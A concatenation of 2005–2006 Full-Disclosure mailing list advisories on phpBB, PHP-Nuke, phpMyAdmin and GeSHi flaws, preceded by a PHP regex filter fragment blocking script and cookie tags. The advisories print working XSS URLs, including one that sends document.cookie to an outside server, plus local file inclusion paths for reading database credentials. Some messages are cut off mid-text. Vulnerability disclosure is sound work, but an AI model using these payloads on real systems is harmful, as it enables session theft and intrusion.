//Lets now sanitize the GET vars foreach ($_GET as $secvalue) { if (!is_array($secvalue)) { if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) || (eregi(".*[[:space:]](or|and)[[:space:]].*(=|like).*", $secvalue)) || (eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*form.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*img.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) || (eregi("\"", $secvalue))) { pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity Alert','GET Intrusion detection.'); Header("Location: index.php"); } } } } //Lets now sanitize the POST vars if ( count($_POST) > 0) { foreach ($_POST as $secvalue) { if (!is_array($secvalue)) { if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) ) { pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity Alert','POST Intrusion detection.');
RE: [Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin
> From: Berliner > 1. Basically all phpBB admin-side options do allow full HTML, including > javascript. That is the intended behaviour, as there are legitimate uses. > > phpBB does however check the Session ID before allowing the changes to go to > the database. > Your exploit needs a valid admin session key and you need to get the admin > to visit the page (unless you happen to have a lot of luck with your IP)- be > it by a link or a reflecting page. And even then, it will only work, when > the admin has logged into the ACP prior to running into the trap. > $sid=''; preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid); if($sid[1]!=''){ header("Location: ".$operation."&sid=".$sid[1]); if you have example http://SOME.SCRIPT.PHP";> and you send reffere... (testes in IE, Mozilla etc) that please check.. getenv('HTTP_REFERER') The phpBB team was informed about this issues and they confirmed that these vulnerabilitie exists in phpBB 2.0.19. Solusion is use POST for all operation. > 2. That is a general problem with all pages allowing of-site pictures. It > has been discussed on the list before. Most of your examples won't work with > phpBB, due to the missing Session ID in the links. -- pub 1024D/7FDF4CEE 2005-09-21 uid Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]> sub 2048g/AE816DB6 2005-09-21 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
Orginal Source: http://securityreason.com/achievement_securityalert/31 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 3.2.2006 from SecurityReason.Com CVE-2006-0437 for the XSS issues CVE-2006-0438 for the CSRF issues - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. XSS admin --- In admin/admin_smilies.php you can create, modifcate smille. So nothing special but phpBB don't check what is going to db. case savenew - -448-473--- $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code']; $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url'] : $HTTP_GET_VARS['smile_url']; $smile_url = phpbb_ltrim(basename($smile_url), "'"); $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion']; $smile_code = trim($smile_code); $smile_url = trim($smile_url); $smile_emotion = trim($smile_emotion); // If no code was entered complain ... if ($smile_code == '' || $smile_url == '') { message_die(GENERAL_MESSAGE, $lang['Fields_empty']); } // // Convert < and > to proper htmlentities for parsing. // $smile_code = str_replace('<', '<', $smile_code); $smile_code = str_replace('>', '>', $smile_code); // // Save the data to the smiley table. // $sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon) VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" . str_replace("\'", "''", $smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')"; $result = $db->sql_query($sql); - -448-473--- Only "<" and ">" are restricted. http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c"; onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN 'alert("SecurityReason.Com")'%20&sid=SIDofADMIN http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN and you have new smile. Ofcourse you can better do exploit. For IE and etc. - --- 2. Cross Site Request Forgeries --- phpBB admin in Administration Panel have SID in url. Ok. Example if you want see user profil or split, lock someone post etc. Like: http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0 http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35 etc. If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you can create url to script with referer for admin.So when admin open profil the url will be executed. Need be referer in request. Next problem is: 103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif| png))$)#is", $avatar_filename) ) in includes/unsercp_avatar.php. Why? Because this preg() don't have limit of chars. In mysql phpbb DB you have (*_users) user_avatar varchar(100) only 100 chars will go to db. So you can post url like http://[HOST]/[DIR]/script.php/[100 chars].jpg Sent: http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg and in db is: http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur or in bbcode (IMG) http://[HOST]/[DIR]/script.php/securityreason.jpg Nothing special.. Ok.. You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one script. Doesn't need be in serverwhere is phpbb. - -script.php-- http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20'; # http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=ico
[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 16.12.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. XSS --- If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always allow HTML: YES" or are you Guest that you can use this tags: H E L O Exploit: http://HOST/cookies?'+document.cookie)" X=" H A L O and have you cookies. - --- 2. Full Path Disclosure --- In file admin/admin_disallow.php is - -25-31--- if( !empty($setmodules) ) { $filename = basename(__FILE__); $module['Users']['Disallow'] = append_sid($filename); return; } - -25-31--- function append_sid() dosen't exists. And if you have: register_globals = On display_errors = On Try to go: http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 - -RESULT ERROR--- Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28 - -RESULT ERROR--- - --- 3. Greets --- sp3x - --- 4.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D /0u14EN2sQAh1Bwu0yvT48Q= =lsL8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bypass XSS filter in PHPNUKE 7.9=>x
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [Bypass XSS filter in PHPNUKE 7.9=>x cXIb8O3.21] Author: Maksymilian Arciemowicz ( cXIb8O3 ) Date: 14.12.2005 from SECURITYREASON.COM - --- 0.Description --- PHP-Nuke is a Web Portal System, storytelling software, news system, online community or whatever you want to call it. Its goal is to have an automated web site to distribute news and articles with user system. Each user can submit comments to discuss the articles, similar to Slashdot and many others. Features: web admin, polls/surveys with comment, statistics, user customizable box, themes manager, friendly admin GUI, moderation system, sections manager, banner system, backend/headlines generation, Yahoo like search engine, Ephemerids manager, file manager, download manager, faq manager, advanced blocks system, reviews system, newsletter, content management, encyclopedia generator, md5 password encryption, phpBB Forums integration, support for 25 languages, 100% modular and more. Written 100% in PHP and requires Apache, PHP and a SQL Database Server. Supports MySQL, PostgreSQL, Adabas, mSQL and many others. - --- 1. Bypass XSS filter --- In PHPnuke is (file includes/mainfile.php). - -168-193--- if (!defined('ADMIN_FILE') && !file_exists('includes/nukesentinel.php')) { foreach ($_GET as $sec_key => $secvalue) { if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*body*\"?[^>]*>", $secvalue)) || (eregi("\([^>]*\"?[^)]*\)", $secvalue)) || (eregi("\"", $secvalue)) || (eregi("forum_admin", $sec_key)) || (eregi("inside_mod", $sec_key))) { die ($htmltags); } } foreach ($_POST as $secvalue) { if ((eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) || (eregi("<[^>]script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*body*\"?[^>]*>", $secvalue)) || (eregi("<[^>]style*\"?[^>]*>", $secvalue))) { die ($htmltags); } } } - -168-193--- This functions deletes from input html tags like: -
[Full-disclosure] phpBB 2.0.18 SQL Query problem
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpBB 2.0.18 SQL Query problem cXIb8O3.19] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 11.11.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. * SQL query problem --- phpBB2 don't check size of sql query. So we can send any data in all post variables. Standart Environment: post_max_size=8M (standart) max_allowed_packet < 7M (1M standart in mysql) Example Evironment: memory_limit>8MB max_execution_time=30 max_allowed_packet=1M I have written simple request where one variable POST to sql query was 1M. - ---request--- POST /2018/phpBB2/search.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: strlen(x) mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet. (example.1MB.data)...sonCom - ---/request--- so in output: - ---output1--- Could not obtain matched posts list DEBUG MODE SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 Line : 321 File : search.php - ---/output1--- sql error. or when you have: memory_limit=8MB or max_execution_time<30 display_error=1 You can see in output example: - ---output2--- Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 - ---/output2--- - ---output3--- Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 - ---/output3--- Exploit: http://securityreason.com/achievement_exploitalert/4 (simple errors) - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy k1NCDNaYsDg1ofLsZFJDMAw= =dp0t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It is low local file inclusion. No critical. Standart have you $cfg['ThemePath']. More critical bug still exists in phpmyadmin. phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server] [extension]=../../mGPC_muss_be_off_%00 org. adv. http://securityreason.com/achievement_securityalert/1 Maksymilian Arciemowicz [EMAIL PROTECTED] SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE HllDGmvD6iOQiSeH9Sk4WCQ= =9U2v -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin Local file inclusion 2.6.4-pl1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpMyAdmin Local file inclusion 2.6.4-pl1] Author: Maksymilian Arciemowicz ( cXIb8O3 ).18 Date: 10.10.2005 from SECURITYREASON.COM - --- 0.Description --- phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. blablabla... phpMyAdmin is very dangerous script. - --- 1. Local file inclusion (Critical) --- File: ./libraries/grab_globals.lib.php This file is included by many files. Example file index.php - -index.php-- /* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: /** * Gets core libraries and defines some variables */ require_once('./libraries/grab_globals.lib.php'); require_once('./libraries/common.lib.php'); ... - -index.php-- ok so. In ./libraries/grab_globals.lib.php we have: - -101-104-grab_globals.lib.php- if ( ! empty( $__redirect ) ) { require('./' . $__redirect); exit(); } // end if ( ! empty( $__redirect ) ) - -101-104-grab_globals.lib.php- But before we have - -53-67-grab_globals.lib.php--- // check if a subform is submitted $__redirect = NULL; if ( isset( $_POST['usesubform'] ) ) { // if a subform is present and should be used // the rest of the form is deprecated $subform_id = key( $_POST['usesubform'] ); $subform= $_POST['subform'][$subform_id]; $_POST = $subform; if ( isset( $_POST['redirect'] ) && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) { $__redirect = $_POST['redirect']; unset( $_POST['redirect'] ); } // end if ( isset( $_POST['redirect'] ) ) } // end if ( isset( $_POST['usesubform'] ) ) // end check if a subform is submitted - -53-67-grab_globals.lib.php--- If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']). $subform= $_POST['subform'][$subform_id]; $_POST = $subform; where array $_POST = array $_POST[subform][1] that $_POST['redirect']=$_POST[subform][1][redirect] and we have local file inclusion. Example response in html: - -Exploit--- File - -Exploit--- Exploit: http://securityreason.com/achievement_exploitalert/2 - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg WWW: http://securityreason.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T cvqCRiRlK9XrQGvV3sYxzXQ= =yoDY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GeSHi Local PHP file inclusion 1.0.7.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [GeSHi Local PHP file inclusion 1.0.7.2] Author: Maksymilian Arciemowicz ( cXIb8O3 ).17 Date: 21.9.2005 from SECURITYREASON.COM - --- 0.Description --- GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems. Several systems are using GeSHi now, including: PostNuke - A popular open source CMS Docuwiki - An advanced wiki engine gtk.php.net - Their manual uses GeSHi for syntax highlighting WordPress - A powerful blogging system PHP-Fusion - A constantly evovling CMS SQL Manager - A Postgres DBAL Mambo - A popular open source CMS MediaWiki - A leader in Wikis TikiWiki - A megapowerful Wiki/CMS, and one I personally use RWeb - A site-building tool - --- 1. Local (PHP) file inclusion --- I have found one bug in file ./contrib/example.php This file exists in standart packet GeSHi. In file: - -10-18-line--- include('../geshi.php'); if ( isset($_POST['submit']) ) { if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']); if ( !strlen(trim($_POST['source'])) ) { $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php')); $_POST['language'] = 'php'; } - -10-18-line--- Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file (for example in postnuke -config.php-). You need use varible $_POST['language'] wher is path to php file. I have tested this bug in GeSHi package and in PostNuke 0.760. PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php) We can read config.php in PostNuke where we have login, password, dbname and dbhost. All variables needed to log in to database. So we can just use this exploit below : - --- EXPLOIT TESTED IN POSTNUKE 0.760 --- http://securityreason.com"; target="http://securityreason.com/";>http://securityreason.com/gfx/small_logo.png";> http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"; method="post"> Path to file: example: ../../../../config - --- EXPLOIT FOR POSTNUKE 0.760 --- [HOST] = example. http://www.securityreason.com/postnuke/html any questions? ;] - --- 2. How to fix --- Patch http://securityreason.com/patch/2 works in PostNuke 0.760 or new version of script 1.0.7.3 - --- 3. Greets --- sp3x - --- 4.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm MWVTap2Adcne2IMt7OpZHmM= =JulS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/